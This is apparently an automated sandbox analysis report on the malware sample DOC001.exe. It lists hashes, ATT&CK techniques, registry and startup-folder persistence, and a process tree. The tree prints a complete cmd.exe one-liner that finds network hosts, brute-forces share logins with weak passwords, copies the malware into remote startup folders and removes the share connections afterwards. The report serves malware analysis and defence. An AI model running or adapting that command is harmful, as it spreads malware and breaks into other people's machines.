0646ba6c2134d07f8e37469afb53100398d55e73789991715b7c576f015cd3f4

General

Target

DOC001.exe
Size

1009KB
MD5

26ed698da25b4644a62ca4b33513395c
SHA1

0b36728a48fbff17a45be400c628052e6dca95fc
SHA256

93b0ea64ed8a6c613b656b8835e34f54b12a971e27a257e2c9afbf9eeb62b8f9
SHA512

af1ff50d0719667ed0579addda6099c56a6e208eaea771be1aa313dfcc3aad589cca40c6f5b0d1a832d09d5a6ffeb640c141edc3fb81c6e50f4cd51cdf6c4513
SSDEEP

24576:hEgl/FR7UL8postqaU3lW5TxAZpmrDXYTryi:rDlu8ppqaylklVrDXa1

Score

8^/10

defense_evasion discovery persistence

Malware Config

Signatures

Indicator Removal: Network Share Connection Removal 1 TTPs 1 IoCs

Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation.

defense_evasion

Network Share Connection Removal

T1070.005

pid	Process
1488	cmd.exe

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\explorer.lnk	DOC001.exe

Executes dropped EXE 1 IoCs

pid	Process
2220	DOC001.exe

Loads dropped DLL 4 IoCs

pid	Process
2696	DOC001.exe
2220	DOC001.exe
2220	DOC001.exe
2220	DOC001.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Windows\CurrentVersion\Run\	DOC001.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\	DOC001.exe

Enumerates connected drives 3 TTPs 1 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\E:	DOC001.exe

Network Service Discovery 1 TTPs 1 IoCs

Attempt to gather information on host's network.

discovery

Network Service Discovery

T1046

pid	Process
2948	cmd.exe

Network Share Discovery 1 TTPs
Attempt to gather information on host network.
discovery

Network Share Discovery
T1135
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	DOC001.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	DOC001.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	find.exe

NSIS installer 2 IoCs

installer

resource	yara_rule
behavioral1/files/0x0007000000016d0b-3.dat	nsis_installer_1
behavioral1/files/0x0007000000016d0b-3.dat	nsis_installer_2

Discovers systems in the same network 1 TTPs 1 IoCs

discovery

Remote System Discovery

T1018

pid	Process
2716	net.exe

Suspicious use of WriteProcessMemory 24 IoCs

description	pid	Process	procid_target
PID 2696 wrote to memory of 2220	2696	DOC001.exe	30
PID 2696 wrote to memory of 2220	2696	DOC001.exe	30
PID 2696 wrote to memory of 2220	2696	DOC001.exe	30
PID 2696 wrote to memory of 2220	2696	DOC001.exe	30
PID 2220 wrote to memory of 1488	2220	DOC001.exe	33
PID 2220 wrote to memory of 1488	2220	DOC001.exe	33
PID 2220 wrote to memory of 1488	2220	DOC001.exe	33
PID 2220 wrote to memory of 1488	2220	DOC001.exe	33
PID 1488 wrote to memory of 2948	1488	cmd.exe	35
PID 1488 wrote to memory of 2948	1488	cmd.exe	35
PID 1488 wrote to memory of 2948	1488	cmd.exe	35
PID 1488 wrote to memory of 2948	1488	cmd.exe	35
PID 2948 wrote to memory of 2716	2948	cmd.exe	36
PID 2948 wrote to memory of 2716	2948	cmd.exe	36
PID 2948 wrote to memory of 2716	2948	cmd.exe	36
PID 2948 wrote to memory of 2716	2948	cmd.exe	36
PID 2948 wrote to memory of 2584	2948	cmd.exe	37
PID 2948 wrote to memory of 2584	2948	cmd.exe	37
PID 2948 wrote to memory of 2584	2948	cmd.exe	37
PID 2948 wrote to memory of 2584	2948	cmd.exe	37
PID 1488 wrote to memory of 2952	1488	cmd.exe	39
PID 1488 wrote to memory of 2952	1488	cmd.exe	39
PID 1488 wrote to memory of 2952	1488	cmd.exe	39
PID 1488 wrote to memory of 2952	1488	cmd.exe	39

C:\Users\Admin\AppData\Local\Temp\DOC001.exe
"C:\Users\Admin\AppData\Local\Temp\DOC001.exe"
1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2696
- C:\Users\Admin\AppData\Roaming\Temps\DOC001.exe
  "C:\Users\Admin\AppData\Roaming\Temps\DOC001.exe"
  2⤵
  - Drops startup file
  - Executes dropped EXE
  - Loads dropped DLL
  - Adds Run key to start application
  - Enumerates connected drives
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2220
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /v:on /c (for /f "usebackq tokens=1,*" %i in (`net view^|find /i "\\" ^|^| arp -a^|find /i " 1"`) do set str_!random!=%i)& for /f "usebackq tokens=1* delims==" %j in (`set str_`) do set s=%k& set s=!s:\\=!& set l=!s:-PC=!& set l=!l:-ÏÊ=!& set f=DOC001.exe& if not "!s!"=="%COMPUTERNAME%" (for /f "usebackq tokens=1,*" %j in (`net view \\!s!^|find /i " "`) do echo f|xcopy /y /d "C:\Users\Admin\AppData\Roaming\Temps\DOC001.exe" "\\!s!\%j\DOC001.exe") & net use * /delete /y & (for %u in (1 !l! administrator user admin àäìèíèñòðàòîð) do @for %p in (0 "" %u 1 123) do ping -n 3 localhost & (for %c in (\\!s!\C$ \\!s!\Users) do (if not "%p%u"=="01" net use %c "%p" /user:"%u") && ((for %d in ("%c\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\Documents and Settings\%u\Start Menu\Programs\Startup\!f!" "%c\%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\!f!") do echo f|xcopy /y /d "C:\Users\Admin\AppData\Roaming\Temps\DOC001.exe" %d) & net use %c /delete /y & ping -n 20 localhost)))
    3⤵
    - Indicator Removal: Network Share Connection Removal
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1488
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c net view|find /i "\\" || arp -a|find /i " 1"
      4⤵
      Network Service Discovery
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2948
    - - C:\Windows\SysWOW64\net.exe
        
        net view
        5⤵
        System Location Discovery: System Language Discovery
        Discovers systems in the same network
        
        PID:2716
    - - C:\Windows\SysWOW64\find.exe
        
        find /i "\\"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2584
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c set str_
      4⤵
      System Location Discovery: System Language Discovery
      PID:2952

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Defense Evasion

Indicator Removal

1

T1070

Network Share Connection Removal

Modify Registry

Credential Access

Discovery

Network Service Discovery

1

T1046

Network Share Discovery

1

T1135

Peripheral Device Discovery

Query Registry

Remote System Discovery

1

T1018

System Information Discovery

2

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

\Users\Admin\AppData\Local\Temp\nsdA9F6.tmp\inetc.dll

Filesize
21KB

MD5
d7a3fa6a6c738b4a3c40d5602af20b08

SHA1
34fc75d97f640609cb6cadb001da2cb2c0b3538a

SHA256
67eff17c53a78c8ec9a28f392b9bb93df3e74f96f6ecd87a333a482c36546b3e

SHA512
75cf123448567806be5f852ebf70f398da881e89994b82442a1f4bc6799894e799f979f5ab1cc9ba12617e48620e6c34f71e23259da498da37354e5fd3c0f934

Download Submit
\Users\Admin\AppData\Roaming\Temps\DOC001.exe

Filesize
1009KB

MD5
26ed698da25b4644a62ca4b33513395c

SHA1
0b36728a48fbff17a45be400c628052e6dca95fc

SHA256
93b0ea64ed8a6c613b656b8835e34f54b12a971e27a257e2c9afbf9eeb62b8f9

SHA512
af1ff50d0719667ed0579addda6099c56a6e208eaea771be1aa313dfcc3aad589cca40c6f5b0d1a832d09d5a6ffeb640c141edc3fb81c6e50f4cd51cdf6c4513

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads